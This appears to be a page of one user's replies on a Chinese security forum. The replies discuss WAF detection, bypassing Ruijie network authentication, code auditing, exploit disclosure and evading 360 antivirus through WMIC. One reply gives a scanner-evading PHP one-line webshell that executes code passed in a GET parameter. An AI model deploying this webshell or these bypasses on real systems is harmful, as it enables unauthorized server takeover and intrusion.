最新回复

  • 帖子作者
    回复
  • #861503

    识别WAF,其实这个很不靠谱。咱们怎么知道对面一定是WAF? 如果特征识别WAF,完全可以伪造特征。而且你要做的https://github.com/sandrogauci/wafw00f已经做好了,效果不太理想。

  • #861506

    回复 2# trueai 目的就是为了正面绕过锐捷服务端。要想上网思路太多了。

  • #861508

    回复 3# trueai 这就是体现技术价值的地方。 如果只能正面绕过锐捷服务端,这种思路没有可取的地方啊。 目的不是为上网,而是绕过锐捷服务端。

  • #861509

    回复 3# trueai 技术上死磕很有必要的,思路也是技术的一种体现。

  • #862688

    回复 8# dark520 如果没有通过锐捷客户端认证是无法上网的。在局域网中只能访问到同C段设备。你想要其他思路么?要黑掉同学的电脑?给管理员丢个BADUSB?

  • #862690

    回复 11# mrhonest1 内网ARP广播,C段内你能收到的。RARP也能获取到IP。

  • #862692

    回复 9# milkedabai 这个不是破解。锐捷客户端认证机制有问题,没有考虑到两个相同的IP和MAC情况。

  • #861413

    思路是一部分。已经有几年没有搞思路了,在做代码审计和逆向分析。提权漏洞为什么能提权?PHP内核机制是怎么样的?利用机制能不能找到其他漏洞。渗透技巧在扎实的代码审计和逆向分析面前都是浮云。

  • #861463

    回复 67# kiwings 从理论上讲所有软件都能进行逆向分析查看源码逻辑。重点是源码逻辑,分析病毒流程其实是查看病毒逻辑。逆向Python解释器是不是就了解Python解释器逻辑,如果存在漏洞会不会影响Python?

  • #848127

    回复 1# SKY258 别期待了。都说会出POC,什么时候会,没有个定数。我到觉得POC会出来,EXP应该不会的。危害很大,放出EXP,别人拿着入侵,岂不是助纣为虐?还是踏踏实实学习技术,系统一代一代更新问题很多。搞懂原理,什么机器拿不下权限?

  • #847836

    如果是入侵后提交SRC、hackerone、或类似之前乌云这样的网站,出现损失,法律如何判断,这种中间机构的责任?

  • #848129

    回复 13# 老鬼 你牛逼。这个思路也是很骚的。买个 保洁制服打扫,也可行。

  • #848123

    回复 30# Twenty-seven 再转个5W,特大案件了。算是钓鱼执法么..

  • #847545

    虚拟机windows 7 系统之中,运行360安全卫士,部分防御是无法开启的。如果把360核晶防护开启,可能就无法绕过了。WIMC添加用户,其实可以绕过360防御。有心可以了解下。

  • #847641

    回复 17# WBGlIl 并不是我将虚拟机想的太简单了,请不要针对我。我和360对于这个问题进行过沟通,我告诉你的是360官方给我的反馈。 因为这个问题我还获得过360几次致谢。在之后360应该对于这个功能进行了调整,具体情况我就没有再跟进过。

  • #847030

    厉害了,老铁好秀。这个站搞了时间不短吧,花了多久?

  • #846914

    666.这种方法思路扩展了好多。{:6_433:}D盾估计又要更新了吧。

  • #846872

    回复 2# 梦想社 哈哈哈,免杀方法多如牛毛。 重要的是思路。

  • #846873

    回复 1# labixx call_user_func 没看到被禁,写个文件就行。一句话不含有PHP字样,试试看。 <?=$h=substr("no_assert",3,9);$e="$_GET";$h(0?:$e); 用法:?1=phpinfo();

  • #846773

    回复 2# 鲁人甲007 哈哈哈 就是个免杀,起了个高大上的名字。我看到CNVD以前有收录过,要不是这个还真没注意。

Top ↑